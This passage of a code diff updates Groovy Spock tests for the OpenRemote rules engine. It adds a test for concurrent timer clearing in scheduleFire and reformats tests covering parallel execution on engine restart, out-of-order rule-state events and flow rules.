-                GROOVY,
-                getClass().getResource("/org/openremote/test/rules/ParallelEngineCheck.groovy").text)
-        Long masterRulesetId = rulesetStorageService.merge(ruleset).id
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check schedule fire tolerates concurrent timer clearing"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
 
-        and: "assets are added"
-        def counterAsset = new ThingAsset("CounterAsset")
-                .setId(UniqueIdentifierGenerator.generateId("CounterAsset"))
-                .setRealm(Constants.MASTER_REALM)
-                .addAttributes(
-                        new Attribute<>("count", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                )
-        counterAsset = assetStorageService.merge(counterAsset)
+    and: "a simple realm ruleset is deployed"
+    Ruleset ruleset = new RealmRuleset(
+            Constants.MASTER_REALM,
+            "Concurrent timer clearing",
+            GROOVY,
+            getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-        }
-
-        when: "a mock rules engine is created"
-        // We want to stop rules evaluation while doing this setup, otherwise our count of attribute event change is biased
-        rulesService.stop(container)
-        RulesEngine mockRulesEngine = Spy(engine)
-        AtomicBoolean rulesExecuting = new AtomicBoolean(false)
-        AtomicBoolean parallelExecutionOccurred = new AtomicBoolean(false)
-        mockRulesEngine.fireAllDeployments() >> {
-            println("Rules executing")
-            if (rulesExecuting.getAndSet(true)) {
-                parallelExecutionOccurred.set(true)
-            }
-            callRealMethod()
-            rulesExecuting.set(false)
-        }
-        rulesService.realmEngines.put(Constants.MASTER_REALM, mockRulesEngine)
-        rulesService.start(container)
-
-        and: "An attribute has changed value"
-        def receivedEvents = new ArrayList<AttributeEvent>()
-        assetProcessingService.addEventInterceptor { EntityManager em, AttributeEvent event ->
-            receivedEvents.add(event)
-            false
-        }
-
-
-        and: "the engine is restarted while rules are evaluating"
-        conditions.eventually {
-            assert(rulesExecuting.get())
-        }
-        mockRulesEngine.stop()
-        // We don't want to start immediately, we want the start code to execute while the rules are evaluating
-        // but the firing of the timer created by this call to happen after the rules have evaluated
-        Thread.sleep(300)
-        mockRulesEngine.start()
-
-        then: "A new attribute event is sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 4
-        }
-        assert !parallelExecutionOccurred.get(): "Rules engine triggered while rules are still executing"
+    expect: "the rules engine to become available and running"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
     }
 
-    /*
-     The exact timing issue is:
-     - fireTimer triggers and is executing the rules (fireAllDeployments)
-     - stop is called, cancelling the fireTimer and setting it to null
-     - start is called, creating a new fireTimer
-     - in this case, that new timer already fires while fireAllDeployments is still running
-       As a result, the newly created timer triggers while the original rules execution is still happening
-     */
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check rules engine are not running in parallel on engine restart with new firing during current rule execution"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+    when: "the timer reference is cleared after the running check but before the delay lookup"
+    engine.stop()
+    engine.@running = true
 
-        and: "some rulesets with a long running rule"
-        Ruleset ruleset = new RealmRuleset(
-                Constants.MASTER_REALM,
-                "Parallel Engine check rules",
-                GROOVY,
-                getClass().getResource("/org/openremote/test/rules/ParallelEngineCheck.groovy").text)
-        Long masterRulesetId = rulesetStorageService.merge(ruleset).id
-
-        and: "assets are added"
-        def counterAsset = new ThingAsset("CounterAsset")
-                .setId(UniqueIdentifierGenerator.generateId("CounterAsset"))
-                .setRealm(Constants.MASTER_REALM)
-                .addAttributes(
-                        new Attribute<>("count", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                )
-        counterAsset = assetStorageService.merge(counterAsset)
-
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-        }
-
-        when: "a mock rules engine is created"
-        // We want to stop rules evaluation while doing this setup, otherwise our count of attribute event change is biased
-        rulesService.stop(container)
-        RulesEngine mockRulesEngine = Spy(engine)
-        AtomicBoolean rulesExecuting = new AtomicBoolean(false)
-        AtomicBoolean parallelExecutionOccurred = new AtomicBoolean(false)
-        mockRulesEngine.fireAllDeployments() >> {
-            println("Rules executing")
-            if (rulesExecuting.getAndSet(true)) {
-                parallelExecutionOccurred.set(true)
-            }
-            callRealMethod()
-            rulesExecuting.set(false)
-        }
-        rulesService.realmEngines.put(Constants.MASTER_REALM, mockRulesEngine)
-        rulesService.start(container)
-
-        and: "An attribute has changed value"
-        def receivedEvents = new ArrayList<AttributeEvent>()
-        assetProcessingService.addEventInterceptor { EntityManager em, AttributeEvent event ->
-            receivedEvents.add(event)
-            false
-        }
-
-
-        and: "the engine is restarted while rules are evaluating"
-        conditions.eventually {
-            assert(rulesExecuting.get())
-        }
-        mockRulesEngine.stop()
-        // With an immediate stop/start, the rules taking 600 ms to executing and the firing period being 500ms
-        // the newly created timer should fire while the initial rules are still evaluating
-        mockRulesEngine.start()
-
-        then: "A new attribute event is sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 4
-        }
-        assert !parallelExecutionOccurred.get(): "Rules engine triggered while rules are still executing"
+    ScheduledFuture<?> timer = Mock(ScheduledFuture)
+    timer.isDone() >> {
+      engine.@fireTimer = null
+      false
     }
+    timer.getDelay(TimeUnit.MILLISECONDS) >> 0L
+    engine.@fireTimer = timer
+
+    engine.scheduleFire(true)
+
+    then: "the quick fire check does not dereference a null timer"
+    noExceptionThrown()
+
+    cleanup:
+    stopContainer()
+  }
+
+  /*
+   The exact timing issue is:
+   - fireTimer triggers and is executing the rules (fireAllDeployments)
+   - stop is called, cancelling the fireTimer and setting it to null
+   - start is called, creating a new fireTimer
+   - in this case, that new timer does not fire yet and fireAllDeployments returns,
+   the fire lambda sets fireTimer to null and creates a new timer
+   As a result, two timers are active at the same time
+   */
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check rules engine are not running in parallel on engine restart with new firing after rule execution"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
+
+    and: "some rulesets with a long running rule"
+    Ruleset ruleset = new RealmRuleset(
+            Constants.MASTER_REALM,
+            "Parallel Engine check rules",
+            GROOVY,
+            getClass().getResource("/org/openremote/test/rules/ParallelEngineCheck.groovy").text)
+    Long masterRulesetId = rulesetStorageService.merge(ruleset).id
+
+    and: "assets are added"
+    def counterAsset = new ThingAsset("CounterAsset")
+            .setId(UniqueIdentifierGenerator.generateId("CounterAsset"))
+            .setRealm(Constants.MASTER_REALM)
+            .addAttributes(
+            new Attribute<>("count", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            )
+    counterAsset = assetStorageService.merge(counterAsset)
+
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+    }
+
+    when: "a mock rules engine is created"
+    // We want to stop rules evaluation while doing this setup, otherwise our count of attribute event change is biased
+    rulesService.stop(container)
+    RulesEngine mockRulesEngine = Spy(engine)
+    AtomicBoolean rulesExecuting = new AtomicBoolean(false)
+    AtomicBoolean parallelExecutionOccurred = new AtomicBoolean(false)
+    mockRulesEngine.fireAllDeployments() >> {
+      println("Rules executing")
+      if (rulesExecuting.getAndSet(true)) {
+        parallelExecutionOccurred.set(true)
+      }
+      callRealMethod()
+      rulesExecuting.set(false)
+    }
+    rulesService.realmEngines.put(Constants.MASTER_REALM, mockRulesEngine)
+    rulesService.start(container)
+
+    and: "An attribute has changed value"
+    def receivedEvents = new ArrayList<AttributeEvent>()
+    assetProcessingService.addEventInterceptor { EntityManager em, AttributeEvent event ->
+      receivedEvents.add(event)
+      false
+    }
+
+
+    and: "the engine is restarted while rules are evaluating"
+    conditions.eventually {
+      assert(rulesExecuting.get())
+    }
+    mockRulesEngine.stop()
+    // We don't want to start immediately, we want the start code to execute while the rules are evaluating
+    // but the firing of the timer created by this call to happen after the rules have evaluated
+    Thread.sleep(300)
+    mockRulesEngine.start()
+
+    then: "A new attribute event is sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 4
+    }
+    assert !parallelExecutionOccurred.get(): "Rules engine triggered while rules are still executing"
+  }
+
+  /*
+   The exact timing issue is:
+   - fireTimer triggers and is executing the rules (fireAllDeployments)
+   - stop is called, cancelling the fireTimer and setting it to null
+   - start is called, creating a new fireTimer
+   - in this case, that new timer already fires while fireAllDeployments is still running
+   As a result, the newly created timer triggers while the original rules execution is still happening
+   */
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check rules engine are not running in parallel on engine restart with new firing during current rule execution"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
+
+    and: "some rulesets with a long running rule"
+    Ruleset ruleset = new RealmRuleset(
+            Constants.MASTER_REALM,
+            "Parallel Engine check rules",
+            GROOVY,
+            getClass().getResource("/org/openremote/test/rules/ParallelEngineCheck.groovy").text)
+    Long masterRulesetId = rulesetStorageService.merge(ruleset).id
+
+    and: "assets are added"
+    def counterAsset = new ThingAsset("CounterAsset")
+            .setId(UniqueIdentifierGenerator.generateId("CounterAsset"))
+            .setRealm(Constants.MASTER_REALM)
+            .addAttributes(
+            new Attribute<>("count", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            )
+    counterAsset = assetStorageService.merge(counterAsset)
+
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+    }
+
+    when: "a mock rules engine is created"
+    // We want to stop rules evaluation while doing this setup, otherwise our count of attribute event change is biased
+    rulesService.stop(container)
+    RulesEngine mockRulesEngine = Spy(engine)
+    AtomicBoolean rulesExecuting = new AtomicBoolean(false)
+    AtomicBoolean parallelExecutionOccurred = new AtomicBoolean(false)
+    mockRulesEngine.fireAllDeployments() >> {
+      println("Rules executing")
+      if (rulesExecuting.getAndSet(true)) {
+        parallelExecutionOccurred.set(true)
+      }
+      callRealMethod()
+      rulesExecuting.set(false)
+    }
+    rulesService.realmEngines.put(Constants.MASTER_REALM, mockRulesEngine)
+    rulesService.start(container)
+
+    and: "An attribute has changed value"
+    def receivedEvents = new ArrayList<AttributeEvent>()
+    assetProcessingService.addEventInterceptor { EntityManager em, AttributeEvent event ->
+      receivedEvents.add(event)
+      false
+    }
+
+
+    and: "the engine is restarted while rules are evaluating"
+    conditions.eventually {
+      assert(rulesExecuting.get())
+    }
+    mockRulesEngine.stop()
+    // With an immediate stop/start, the rules taking 600 ms to executing and the firing period being 500ms
+    // the newly created timer should fire while the initial rules are still evaluating
+    mockRulesEngine.start()
+
+    then: "A new attribute event is sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 4
+    }
+    assert !parallelExecutionOccurred.get(): "Rules engine triggered while rules are still executing"
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/RulesServiceStateOrderingTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/RulesServiceStateOrderingTest.groovy
@@ -40,112 +40,116 @@ import spock.util.concurrent.PollingConditions
 
 class RulesServiceStateOrderingTest extends Specification implements ManagerContainerTrait {
 
-    def "pre-init buffer should keep the newest rule state event for the same attribute"() {
-        given:
-        def rulesService = new RulesService()
-        def ref = new AttributeRef(UniqueIdentifierGenerator.generateId("Buffered state asset"), "count")
-        def ruleStateMeta = new MetaMap([new MetaItem<>(MetaItemType.RULE_STATE)])
+  def "pre-init buffer should keep the newest rule state event for the same attribute"() {
+    given:
+    def rulesService = new RulesService()
+    def ref = new AttributeRef(UniqueIdentifierGenerator.generateId("Buffered state asset"), "count")
+    def ruleStateMeta = new MetaMap([new MetaItem<>(MetaItemType.RULE_STATE)])
 
-        and:
-        def olderEvent = new AttributeEvent(ref, 1, 1000L)
+    and:
+    def olderEvent = new AttributeEvent(ref, 1, 1000L)
             .setMeta(ruleStateMeta)
             .setRealm(Constants.MASTER_REALM)
-        def newerEvent = new AttributeEvent(ref, 2, 2000L)
+    def newerEvent = new AttributeEvent(ref, 2, 2000L)
             .setMeta(ruleStateMeta)
             .setRealm(Constants.MASTER_REALM)
 
-        when:
-        rulesService.onAttributeEvent(olderEvent)
-        rulesService.onAttributeEvent(newerEvent)
+    when:
+    rulesService.onAttributeEvent(olderEvent)
+    rulesService.onAttributeEvent(newerEvent)
 
-        then:
-        rulesService.preInitAttributeEvents.size() == 1
-        def bufferedEvent = rulesService.preInitAttributeEvents.get(ref)
-        bufferedEvent != null
-        bufferedEvent.timestamp == 2000L
-        bufferedEvent.value.get() == 2
-    }
+    then:
+    rulesService.preInitAttributeEvents.size() == 1
+    def bufferedEvent = rulesService.preInitAttributeEvents.get(ref)
+    bufferedEvent != null
+    bufferedEvent.timestamp == 2000L
+    bufferedEvent.value.get() == 2
+  }
 
-    def "pre-init buffer should keep a later retract even when its value timestamp is older"() {
-        given:
-        def rulesService = new RulesService()
-        def ref = new AttributeRef(UniqueIdentifierGenerator.generateId("Buffered retract asset"), "count")
-        def ruleStateMeta = new MetaMap([new MetaItem<>(MetaItemType.RULE_STATE)])
+  def "pre-init buffer should keep a later retract even when its value timestamp is older"() {
+    given:
+    def rulesService = new RulesService()
+    def ref = new AttributeRef(UniqueIdentifierGenerator.generateId("Buffered retract asset"), "count")
+    def ruleStateMeta = new MetaMap([new MetaItem<>(MetaItemType.RULE_STATE)])
 
-        and:
-        def newerInsert = new AttributeEvent(ref, 2, 2000L)
+    and:
+    def newerInsert = new AttributeEvent(ref, 2, 2000L)
             .setMeta(ruleStateMeta)
             .setRealm(Constants.MASTER_REALM)
-        def laterRetract = new AttributeEvent(ref, null, 1000L)
+    def laterRetract = new AttributeEvent(ref, null, 1000L)
             .setMeta(ruleStateMeta)
             .setRealm(Constants.MASTER_REALM)
             .setDeleted(true)
 
-        when:
-        rulesService.onAttributeEvent(newerInsert)
-        rulesService.onAttributeEvent(laterRetract)
+    when:
+    rulesService.onAttributeEvent(newerInsert)
+    rulesService.onAttributeEvent(laterRetract)
 
-        then:
-        rulesService.preInitAttributeEvents.size() == 1
-        def bufferedEvent = rulesService.preInitAttributeEvents.get(ref)
-        bufferedEvent != null
-        bufferedEvent.deleted
-        bufferedEvent.timestamp == 1000L
-    }
+    then:
+    rulesService.preInitAttributeEvents.size() == 1
+    def bufferedEvent = rulesService.preInitAttributeEvents.get(ref)
+    bufferedEvent != null
+    bufferedEvent.deleted
+    bufferedEvent.timestamp == 1000L
+  }
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "rules service should keep the newest rule state when committed events arrive out of order"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
+  @SuppressWarnings("GroovyAccessibility")
+  def "rules service should keep the newest rule state when committed events arrive out of order"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
 
-        and: "a rule-state asset exists"
-        def asset = new ThingAsset("Ordered state asset")
+    and: "a rule-state asset exists"
+    def asset = new ThingAsset("Ordered state asset")
             .setId(UniqueIdentifierGenerator.generateId("Ordered state asset"))
             .setRealm(Constants.MASTER_REALM)
             .addAttributes(
-                new Attribute<>("count", ValueType.INTEGER, 0)
-                    .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            new Attribute<>("count", ValueType.INTEGER, 0)
+            .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
             )
-        asset = assetStorageService.merge(asset)
+    asset = assetStorageService.merge(asset)
 
-        expect: "the rule-state cache contains the asset attribute"
-        conditions.eventually {
-            def ruleState = rulesService.attributeEvents.find { it.id == asset.id && it.name == "count" }
-            assert ruleState != null
-            assert ruleState.timestamp > 0
-        }
+    expect: "the rule-state cache contains the asset attribute"
+    conditions.eventually {
+      def ruleState = rulesService.attributeEvents.find {
+        it.id == asset.id && it.name == "count"
+      }
+      assert ruleState != null
+      assert ruleState.timestamp> 0
+    }
 
-        when: "a realm ruleset is deployed"
-        def ruleset = new RealmRuleset(
+    when: "a realm ruleset is deployed"
+    def ruleset = new RealmRuleset(
             Constants.MASTER_REALM,
             "Rule state ordering",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text
-        )
-        rulesetStorageService.merge(ruleset)
-        RulesEngine engine = null
+            )
+    rulesetStorageService.merge(ruleset)
+    RulesEngine engine = null
 
-        then: "the rules engine starts with the cached attribute fact"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.facts.assetStates.find { it.id == asset.id && it.name == "count" } != null
-        }
+    then: "the rules engine starts with the cached attribute fact"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.facts.assetStates.find { it.id == asset.id && it.name == "count" } != null
+    }
 
-        when: "committed rule-state events for the same attribute arrive out of timestamp order"
-        def storedAsset = assetStorageService.find(asset.id, true) as ThingAsset
-        def storedAttribute = storedAsset.getAttribute("count").get()
-        def initialRuleState = rulesService.attributeEvents.find { it.id == asset.id && it.name == "count" }
-        long initialTimestamp = initialRuleState.timestamp
-        long newerTimestamp = initialTimestamp + 2000
-        long olderTimestamp = initialTimestamp + 1000
+    when: "committed rule-state events for the same attribute arrive out of timestamp order"
+    def storedAsset = assetStorageService.find(asset.id, true) as ThingAsset
+    def storedAttribute = storedAsset.getAttribute("count").get()
+    def initialRuleState = rulesService.attributeEvents.find {
+      it.id == asset.id && it.name == "count"
+    }
+    long initialTimestamp = initialRuleState.timestamp
+    long newerTimestamp = initialTimestamp + 2000
+    long olderTimestamp = initialTimestamp + 1000
 
-        def newerEvent = new AttributeEvent(
+    def newerEvent = new AttributeEvent(
             storedAsset,
             storedAttribute,
             getClass().getSimpleName(),
@@ -153,8 +157,8 @@ class RulesServiceStateOrderingTest extends Specification implements ManagerCont
             newerTimestamp,
             storedAttribute.getValue().orElse(null),
             initialTimestamp
-        )
-        def olderEvent = new AttributeEvent(
+            )
+    def olderEvent = new AttributeEvent(
             storedAsset,
             storedAttribute,
             getClass().getSimpleName(),
@@ -162,82 +166,90 @@ class RulesServiceStateOrderingTest extends Specification implements ManagerCont
             olderTimestamp,
             storedAttribute.getValue().orElse(null),
             initialTimestamp
-        )
+            )
 
-        rulesService.onAttributeEvent(newerEvent)
-        rulesService.onAttributeEvent(olderEvent)
+    rulesService.onAttributeEvent(newerEvent)
+    rulesService.onAttributeEvent(olderEvent)
 
-        then: "the cached rule state should still keep the newer timestamp and latest value"
-        def latestRuleState = rulesService.attributeEvents.find { it.id == asset.id && it.name == "count" }
-        assert latestRuleState != null
-        assert latestRuleState.timestamp == newerTimestamp
-        assert latestRuleState.value.get() == 2
+    then: "the cached rule state should still keep the newer timestamp and latest value"
+    def latestRuleState = rulesService.attributeEvents.find {
+      it.id == asset.id && it.name == "count"
+    }
+    assert latestRuleState != null
+    assert latestRuleState.timestamp == newerTimestamp
+    assert latestRuleState.value.get() == 2
 
-        and: "the rule engine fact should also remain on the newer timestamp and latest value"
-        conditions.eventually {
-            def engineState = engine.facts.assetStates.find { it.id == asset.id && it.name == "count" }
-            assert engineState != null
-            assert engineState.timestamp == newerTimestamp
-            assert engineState.value.get() == 2
-        }
-
-        cleanup:
-        stopContainer()
+    and: "the rule engine fact should also remain on the newer timestamp and latest value"
+    conditions.eventually {
+      def engineState = engine.facts.assetStates.find {
+        it.id == asset.id && it.name == "count"
+      }
+      assert engineState != null
+      assert engineState.timestamp == newerTimestamp
+      assert engineState.value.get() == 2
     }
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "rules service should still retract a cached rule state when a later retract arrives with an older value timestamp"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
+    cleanup:
+    stopContainer()
+  }
 
-        and: "a rule-state asset exists"
-        def asset = new ThingAsset("Retract state asset")
+  @SuppressWarnings("GroovyAccessibility")
+  def "rules service should still retract a cached rule state when a later retract arrives with an older value timestamp"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+
+    and: "a rule-state asset exists"
+    def asset = new ThingAsset("Retract state asset")
             .setId(UniqueIdentifierGenerator.generateId("Retract state asset"))
             .setRealm(Constants.MASTER_REALM)
             .addAttributes(
-                new Attribute<>("count", ValueType.INTEGER, 0)
-                    .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            new Attribute<>("count", ValueType.INTEGER, 0)
+            .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
             )
-        asset = assetStorageService.merge(asset)
+    asset = assetStorageService.merge(asset)
 
-        expect: "the initial rule state is cached"
-        conditions.eventually {
-            def ruleState = rulesService.attributeEvents.find { it.id == asset.id && it.name == "count" }
-            assert ruleState != null
-            assert ruleState.timestamp > 0
-        }
+    expect: "the initial rule state is cached"
+    conditions.eventually {
+      def ruleState = rulesService.attributeEvents.find {
+        it.id == asset.id && it.name == "count"
+      }
+      assert ruleState != null
+      assert ruleState.timestamp> 0
+    }
 
-        when: "a realm ruleset is deployed"
-        def ruleset = new RealmRuleset(
+    when: "a realm ruleset is deployed"
+    def ruleset = new RealmRuleset(
             Constants.MASTER_REALM,
             "Rule state retract ordering",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text
-        )
-        rulesetStorageService.merge(ruleset)
-        RulesEngine engine = null
+            )
+    rulesetStorageService.merge(ruleset)
+    RulesEngine engine = null
 
-        then: "the rules engine starts with the cached attribute fact"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.facts.assetStates.find { it.id == asset.id && it.name == "count" } != null
-        }
+    then: "the rules engine starts with the cached attribute fact"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.facts.assetStates.find { it.id == asset.id && it.name == "count" } != null
+    }
 
-        when: "a newer committed state is cached first"
-        def storedAsset = assetStorageService.find(asset.id, true) as ThingAsset
-        def storedAttribute = storedAsset.getAttribute("count").get()
-        def initialRuleState = rulesService.attributeEvents.find { it.id == asset.id && it.name == "count" }
-        long initialTimestamp = initialRuleState.timestamp
-        long newerTimestamp = initialTimestamp + 2000
-        long olderTimestamp = initialTimestamp + 1000
+    when: "a newer committed state is cached first"
+    def storedAsset = assetStorageService.find(asset.id, true) as ThingAsset
+    def storedAttribute = storedAsset.getAttribute("count").get()
+    def initialRuleState = rulesService.attributeEvents.find {
+      it.id == asset.id && it.name == "count"
+    }
+    long initialTimestamp = initialRuleState.timestamp
+    long newerTimestamp = initialTimestamp + 2000
+    long olderTimestamp = initialTimestamp + 1000
 
-        def newerEvent = new AttributeEvent(
+    def newerEvent = new AttributeEvent(
             storedAsset,
             storedAttribute,
             getClass().getSimpleName(),
@@ -245,11 +257,11 @@ class RulesServiceStateOrderingTest extends Specification implements ManagerCont
             newerTimestamp,
             storedAttribute.getValue().orElse(null),
             initialTimestamp
-        )
-        rulesService.onAttributeEvent(newerEvent)
+            )
+    rulesService.onAttributeEvent(newerEvent)
 
-        and: "a delete for the same rule state arrives afterwards carrying an older value timestamp"
-        def olderRetractEvent = new AttributeEvent(
+    and: "a delete for the same rule state arrives afterwards carrying an older value timestamp"
+    def olderRetractEvent = new AttributeEvent(
             storedAsset,
             storedAttribute,
             getClass().getSimpleName(),
@@ -257,20 +269,24 @@ class RulesServiceStateOrderingTest extends Specification implements ManagerCont
             olderTimestamp,
             storedAttribute.getValue().orElse(null),
             initialTimestamp
-        ).setDeleted(true)
-        rulesService.onAttributeEvent(olderRetractEvent)
+            ).setDeleted(true)
+    rulesService.onAttributeEvent(olderRetractEvent)
 
-        then: "the cached rule state should be removed"
-        def latestRuleState = rulesService.attributeEvents.find { it.id == asset.id && it.name == "count" }
-        assert latestRuleState == null
-
-        and: "the rule engine fact should also be removed"
-        conditions.eventually {
-            def engineState = engine.facts.assetStates.find { it.id == asset.id && it.name == "count" }
-            assert engineState == null
-        }
-
-        cleanup:
-        stopContainer()
+    then: "the cached rule state should be removed"
+    def latestRuleState = rulesService.attributeEvents.find {
+      it.id == asset.id && it.name == "count"
     }
+    assert latestRuleState == null
+
+    and: "the rule engine fact should also be removed"
+    conditions.eventually {
+      def engineState = engine.facts.assetStates.find {
+        it.id == asset.id && it.name == "count"
+      }
+      assert engineState == null
+    }
+
+    cleanup:
+    stopContainer()
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/residence/FlowRulesTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/FlowRulesTest.groovy
@@ -48,154 +48,157 @@ import static org.openremote.model.rules.RulesetStatus.DEPLOYED
 
 class FlowRulesTest extends Specification implements ManagerContainerTrait {
 
-    def "Execute flow rules"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+  def "Execute flow rules"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def startTemperature = 25
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def startTemperature = 25
 
-        and: "relevant attributes have been populated"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(
-                managerTestSetup.apartment1LivingroomId,
-                "targetTemperature",
-                startTemperature
-        ))
+    and: "relevant attributes have been populated"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(
+                    managerTestSetup.apartment1LivingroomId,
+                    "targetTemperature",
+                    startTemperature
+                    ))
 
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(
-                managerTestSetup.apartment1Bedroom1Id,
-                "targetTemperature",
-                0
-        ))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(
+                    managerTestSetup.apartment1Bedroom1Id,
+                    "targetTemperature",
+                    0
+                    ))
 
-        when: "a valid node collection is added"
-        String json = getClass().getResource("/org/openremote/test/rules/BasicFlowRules.json").text
-        json = json.replaceAll("%LIVING ROOM ID%", managerTestSetup.apartment1LivingroomId)
-        json = json.replaceAll("%BEDROOM ID%", managerTestSetup.apartment1Bedroom1Id)
-        NodeCollection realCollection = ValueUtil.JSON.readValue(json, NodeCollection.class)
-        def ruleset = (new GlobalRuleset(
-                realCollection.name,
-                Ruleset.Lang.FLOW,
-                json
-        ))
-        rulesetStorageService.merge(ruleset)
+    when: "a valid node collection is added"
+    String json = getClass().getResource("/org/openremote/test/rules/BasicFlowRules.json").text
+    json = json.replaceAll("%LIVING ROOM ID%", managerTestSetup.apartment1LivingroomId)
+    json = json.replaceAll("%BEDROOM ID%", managerTestSetup.apartment1Bedroom1Id)
+    NodeCollection realCollection = ValueUtil.JSON.readValue(json, NodeCollection.class)
+    def ruleset = (new GlobalRuleset(
+                    realCollection.name,
+                    Ruleset.Lang.FLOW,
+                    json
+                    ))
